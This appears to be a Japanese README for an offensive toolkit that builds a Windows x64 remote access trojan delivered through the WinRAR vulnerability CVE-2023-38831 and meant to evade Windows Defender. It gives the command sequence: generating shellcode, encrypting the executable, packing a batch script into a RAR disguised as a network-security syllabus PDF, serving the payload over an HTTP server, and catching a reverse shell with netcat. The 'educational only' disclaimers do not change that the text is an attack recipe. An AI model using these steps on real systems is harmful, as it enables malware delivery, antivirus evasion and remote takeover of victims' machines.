
脆弱性 CVE-2023-38831(WinRAR < 6.23 の脆弱性)と Shellcode エクスプロイト技術を組み合わせた、Windows x64 向けリモートアクセス型トロイの木馬(RAT)。
Windows Defender を回避するために、CVE-2023-38831 (WinRAR < 6.23) とシェルコードの悪用を利用した Windows x64 RAT を開発します。
警告: この情報は教育目的のみで提供されています。これらの技術を無断で使用することは違法かつ非倫理的です。
シェルコードの作成
51721.py を使用して初期シェルコードを生成します。シェルコードの修正とコンパイル
実行可能ファイルの暗号化
decrypt_file.ps1 を使用してコンパイル済みの実行可能ファイルを暗号化します:
.\decrypt_file.ps1 -inputFile .\main.exe -outputFile .\enc_main.exe
WinRAR アーカイブの作成
cve-2023-38831-exp-gen.py を使用してアーカイブを作成します:
python cve-2023-38831-exp-gen.py NetworkSecuritySyllabus.pdf script.bat NetworkSecuritySyllabus.rar
ファイルダウンロード用の Python サーバーのセットアップ
enc_main.exe と decrypt_file.ps1 を含むディレクトリに移動します。python3 -m http.server 8000
リバース TCP シェルの待ち受け準備
nc -lnvp 4444
リバース TCP シェルのトリガー
この情報は教育目的のみで提供されています。明示的な許可なくこのエクスプロイトを使用することは違法かつ非倫理的です。作者は、この情報の悪用について一切の責任を負いません。